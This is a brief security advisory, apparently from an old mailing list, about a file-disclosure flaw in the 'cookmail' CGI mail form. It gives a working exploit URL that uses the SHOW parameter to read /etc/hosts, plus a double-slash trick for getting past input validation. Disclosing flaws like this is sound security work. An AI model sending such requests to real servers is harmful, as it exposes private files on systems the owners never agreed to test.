cookmail - mailform

download it from site: http://ag.arizona.edu/~heng/cookmail/cookmail.html

problem description:

the "SHOW" - paramter allows you to view any file on system with webservers permissions

example:

http://www.fuidiots.com/cgi-bin/cookmail?TO=swoopme@hotmail.com&SHOW=//etc/hosts

(notice the double "/" at the beginning .. helps you to evade primitive input validation of the program :)

thats all

EOF.RC